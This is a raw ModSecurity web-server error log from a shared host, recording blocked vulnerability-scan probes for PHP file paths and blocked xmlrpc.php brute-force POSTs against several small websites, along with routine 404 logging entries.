[Tue May 26 13:56:04.790704 2026] [security2:error] [pid 560287:tid 560543] [client 40.83.92.30:6108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ww5.php"] [unique_id "ahVZHJmX5s6sDS3wJVcpcwAAAPs"]
[Tue May 26 13:56:04.790851 2026] [security2:error] [pid 560287:tid 560543] [client 40.83.92.30:6108] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/ww5.php"] [unique_id "ahVZHJmX5s6sDS3wJVcpcwAAAPs"]
[Tue May 26 13:56:05.359021 2026] [security2:error] [pid 560287:tid 560419] [client 106.192.248.115:58712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZHZmX5s6sDS3wJVcpdQAAAIY"]
[Tue May 26 13:56:05.359163 2026] [security2:error] [pid 560287:tid 560419] [client 106.192.248.115:58712] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZHZmX5s6sDS3wJVcpdQAAAIY"]
[Tue May 26 13:56:05.485430 2026] [security2:error] [pid 560287:tid 560488] [client 40.83.92.30:6109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/2.php"] [unique_id "ahVZHZmX5s6sDS3wJVcpdwAAAMc"]
[Tue May 26 13:56:05.485556 2026] [security2:error] [pid 560287:tid 560488] [client 40.83.92.30:6109] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/2.php"] [unique_id "ahVZHZmX5s6sDS3wJVcpdwAAAMc"]
[Tue May 26 13:56:06.087186 2026] [security2:error] [pid 560287:tid 560549] [client 202.141.30.10:35383] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZHpmX5s6sDS3wJVcpfwAAAQE"]
[Tue May 26 13:56:06.087367 2026] [security2:error] [pid 560287:tid 560549] [client 202.141.30.10:35383] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZHpmX5s6sDS3wJVcpfwAAAQE"]
[Tue May 26 13:56:06.108912 2026] [security2:error] [pid 560287:tid 560466] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZHZmX5s6sDS3wJVcpeQAAALM"]
[Tue May 26 13:56:06.284444 2026] [security2:error] [pid 555743:tid 555912] [client 40.83.92.30:5788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-admin/classwithtostring.php"] [unique_id "ahVZHsjqAquC0YaxQjDGSgAAATE"]
[Tue May 26 13:56:06.284586 2026] [security2:error] [pid 555743:tid 555912] [client 40.83.92.30:5788] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-admin/classwithtostring.php"] [unique_id "ahVZHsjqAquC0YaxQjDGSgAAATE"]
[Tue May 26 13:56:06.747244 2026] [security2:error] [pid 555743:tid 555894] [client 40.83.92.30:5783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/atomlib.php"] [unique_id "ahVZHsjqAquC0YaxQjDGTQAAAR8"]
[Tue May 26 13:56:06.747363 2026] [security2:error] [pid 555743:tid 555894] [client 40.83.92.30:5783] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/atomlib.php"] [unique_id "ahVZHsjqAquC0YaxQjDGTQAAAR8"]
[Tue May 26 13:56:07.229569 2026] [security2:error] [pid 560287:tid 560484] [client 40.83.92.30:5710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/p.php"] [unique_id "ahVZH5mX5s6sDS3wJVcpgwAAAMM"]
[Tue May 26 13:56:07.229712 2026] [security2:error] [pid 560287:tid 560484] [client 40.83.92.30:5710] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/p.php"] [unique_id "ahVZH5mX5s6sDS3wJVcpgwAAAMM"]
[Tue May 26 13:56:07.502171 2026] [security2:error] [pid 560287:tid 560487] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZH5mX5s6sDS3wJVcpggAAAMY"]
[Tue May 26 13:56:07.853869 2026] [security2:error] [pid 555743:tid 555917] [client 40.83.92.30:5765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/php.php"] [unique_id "ahVZH8jqAquC0YaxQjDGVQAAATY"]
[Tue May 26 13:56:07.854010 2026] [security2:error] [pid 555743:tid 555917] [client 40.83.92.30:5765] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/php.php"] [unique_id "ahVZH8jqAquC0YaxQjDGVQAAATY"]
[Tue May 26 13:56:08.331042 2026] [security2:error] [pid 555743:tid 555923] [client 40.83.92.30:5762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/test1.php"] [unique_id "ahVZIMjqAquC0YaxQjDGWAAAATw"]
[Tue May 26 13:56:08.331131 2026] [security2:error] [pid 555743:tid 555923] [client 40.83.92.30:5762] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/test1.php"] [unique_id "ahVZIMjqAquC0YaxQjDGWAAAATw"]
[Tue May 26 13:56:08.777488 2026] [security2:error] [pid 555743:tid 555885] [client 129.222.147.134:9430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZIMjqAquC0YaxQjDGWwAAARY"]
[Tue May 26 13:56:08.785423 2026] [security2:error] [pid 555743:tid 555885] [client 129.222.147.134:9430] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZIMjqAquC0YaxQjDGWwAAARY"]
[Tue May 26 13:56:08.960465 2026] [security2:error] [pid 560287:tid 560475] [client 40.83.92.30:5819] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/uploads/min.php"] [unique_id "ahVZIJmX5s6sDS3wJVcphwAAALs"]
[Tue May 26 13:56:08.960585 2026] [security2:error] [pid 560287:tid 560475] [client 40.83.92.30:5819] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/uploads/min.php"] [unique_id "ahVZIJmX5s6sDS3wJVcphwAAALs"]
[Tue May 26 13:56:09.470952 2026] [security2:error] [pid 560287:tid 560546] [client 40.83.92.30:5803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/zoom1.php"] [unique_id "ahVZIZmX5s6sDS3wJVcpjQAAAP4"]
[Tue May 26 13:56:09.471081 2026] [security2:error] [pid 560287:tid 560546] [client 40.83.92.30:5803] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/zoom1.php"] [unique_id "ahVZIZmX5s6sDS3wJVcpjQAAAP4"]
[Tue May 26 13:56:09.640813 2026] [security2:error] [pid 560287:tid 560495] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZIZmX5s6sDS3wJVcpiwAAAM4"]
[Tue May 26 13:56:09.652734 2026] [security2:error] [pid 560287:tid 560539] [client 82.79.232.79:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZIZmX5s6sDS3wJVcpkAAAAPc"]
[Tue May 26 13:56:09.729062 2026] [security2:error] [pid 555743:tid 555929] [client 146.174.185.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZIcjqAquC0YaxQjDGXwAAAUI"]
[Tue May 26 13:56:10.090859 2026] [security2:error] [pid 560287:tid 560430] [client 40.83.92.30:5821] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/lock360.php"] [unique_id "ahVZIpmX5s6sDS3wJVcplwAAAJE"]
[Tue May 26 13:56:10.090984 2026] [security2:error] [pid 560287:tid 560430] [client 40.83.92.30:5821] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/lock360.php"] [unique_id "ahVZIpmX5s6sDS3wJVcplwAAAJE"]
[Tue May 26 13:56:10.122674 2026] [security2:error] [pid 555743:tid 555993] [client 82.79.232.79:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZIsjqAquC0YaxQjDGYgAAAYI"], referer: http://www.anujtradingco.com/works/portfolio-full-width-square/
[Tue May 26 13:56:10.671764 2026] [security2:error] [pid 555743:tid 555975] [client 40.83.92.30:6119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/b.php"] [unique_id "ahVZIsjqAquC0YaxQjDGZwAAAXA"]
[Tue May 26 13:56:10.671871 2026] [security2:error] [pid 555743:tid 555975] [client 40.83.92.30:6119] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/b.php"] [unique_id "ahVZIsjqAquC0YaxQjDGZwAAAXA"]
[Tue May 26 13:56:11.140172 2026] [security2:error] [pid 560287:tid 560538] [client 40.83.92.30:5789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/buy.php"] [unique_id "ahVZI5mX5s6sDS3wJVcpnQAAAPY"]
[Tue May 26 13:56:11.140296 2026] [security2:error] [pid 560287:tid 560538] [client 40.83.92.30:5789] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/buy.php"] [unique_id "ahVZI5mX5s6sDS3wJVcpnQAAAPY"]
[Tue May 26 13:56:11.350865 2026] [security2:error] [pid 560287:tid 560442] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZIpmX5s6sDS3wJVcpmwAAAJw"]
[Tue May 26 13:56:11.604579 2026] [security2:error] [pid 560287:tid 560431] [client 40.83.92.30:5780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/config.php"] [unique_id "ahVZI5mX5s6sDS3wJVcpowAAAJI"]
[Tue May 26 13:56:11.604709 2026] [security2:error] [pid 560287:tid 560431] [client 40.83.92.30:5780] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/config.php"] [unique_id "ahVZI5mX5s6sDS3wJVcpowAAAJI"]
[Tue May 26 13:56:12.063905 2026] [security2:error] [pid 555743:tid 555980] [client 40.83.92.30:6103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/num.php"] [unique_id "ahVZJMjqAquC0YaxQjDGcAAAAXU"]
[Tue May 26 13:56:12.064020 2026] [security2:error] [pid 555743:tid 555980] [client 40.83.92.30:6103] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/num.php"] [unique_id "ahVZJMjqAquC0YaxQjDGcAAAAXU"]
[Tue May 26 13:56:12.609465 2026] [security2:error] [pid 555743:tid 555997] [client 40.83.92.30:5734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/areak1.php"] [unique_id "ahVZJMjqAquC0YaxQjDGegAAAYY"]
[Tue May 26 13:56:12.609612 2026] [security2:error] [pid 555743:tid 555997] [client 40.83.92.30:5734] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/areak1.php"] [unique_id "ahVZJMjqAquC0YaxQjDGegAAAYY"]
[Tue May 26 13:56:13.139142 2026] [security2:error] [pid 560287:tid 560456] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZJJmX5s6sDS3wJVcpqAAAAKk"]
[Tue May 26 13:56:13.256290 2026] [security2:error] [pid 560287:tid 560437] [client 40.83.92.30:5813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/vc.php"] [unique_id "ahVZJZmX5s6sDS3wJVcpqgAAAJg"]
[Tue May 26 13:56:13.256439 2026] [security2:error] [pid 560287:tid 560437] [client 40.83.92.30:5813] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/vc.php"] [unique_id "ahVZJZmX5s6sDS3wJVcpqgAAAJg"]
[Tue May 26 13:56:13.379605 2026] [security2:error] [pid 555743:tid 555875] [client 106.192.248.115:59021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZJcjqAquC0YaxQjDGgQAAAQw"]
[Tue May 26 13:56:13.379738 2026] [security2:error] [pid 555743:tid 555875] [client 106.192.248.115:59021] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZJcjqAquC0YaxQjDGgQAAAQw"]
[Tue May 26 13:56:13.826680 2026] [security2:error] [pid 555743:tid 555931] [client 40.83.92.30:6017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVZJcjqAquC0YaxQjDGhAAAAUQ"]
[Tue May 26 13:56:13.826799 2026] [security2:error] [pid 555743:tid 555931] [client 40.83.92.30:6017] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVZJcjqAquC0YaxQjDGhAAAAUQ"]
[Tue May 26 13:56:14.373151 2026] [security2:error] [pid 560287:tid 560483] [client 40.83.92.30:5814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/core.php"] [unique_id "ahVZJpmX5s6sDS3wJVcpsAAAAMI"]
[Tue May 26 13:56:14.373283 2026] [security2:error] [pid 560287:tid 560483] [client 40.83.92.30:5814] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/core.php"] [unique_id "ahVZJpmX5s6sDS3wJVcpsAAAAMI"]
[Tue May 26 13:56:14.835130 2026] [security2:error] [pid 560287:tid 560480] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZJpmX5s6sDS3wJVcpswAAAL8"]
[Tue May 26 13:56:14.846650 2026] [security2:error] [pid 560287:tid 560440] [client 40.83.92.30:5742] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVZJpmX5s6sDS3wJVcptAAAAJs"]
[Tue May 26 13:56:15.088503 2026] [security2:error] [pid 560287:tid 560549] [client 40.83.92.30:5742] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVZJ5mX5s6sDS3wJVcptwAAAQE"]
[Tue May 26 13:56:15.335692 2026] [security2:error] [pid 560287:tid 560544] [client 40.83.92.30:5742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/min.php"] [unique_id "ahVZJ5mX5s6sDS3wJVcpuAAAAPw"]
[Tue May 26 13:56:15.335862 2026] [security2:error] [pid 560287:tid 560544] [client 40.83.92.30:5742] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/min.php"] [unique_id "ahVZJ5mX5s6sDS3wJVcpuAAAAPw"]
[Tue May 26 13:56:15.860881 2026] [security2:error] [pid 560287:tid 560507] [client 40.83.92.30:6095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVZJ5mX5s6sDS3wJVcpvgAAANk"]
[Tue May 26 13:56:15.860994 2026] [security2:error] [pid 560287:tid 560507] [client 40.83.92.30:6095] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVZJ5mX5s6sDS3wJVcpvgAAANk"]
[Tue May 26 13:56:16.606654 2026] [security2:error] [pid 555743:tid 555934] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZKMjqAquC0YaxQjDGjwAAAUc"]
[Tue May 26 13:56:16.993155 2026] [security2:error] [pid 555743:tid 555991] [client 202.141.30.10:35478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZKMjqAquC0YaxQjDGkwAAAYA"]
[Tue May 26 13:56:16.993273 2026] [security2:error] [pid 555743:tid 555991] [client 202.141.30.10:35478] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZKMjqAquC0YaxQjDGkwAAAYA"]
[Tue May 26 13:56:18.462645 2026] [security2:error] [pid 560287:tid 560533] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZKpmX5s6sDS3wJVcpzAAAAPM"]
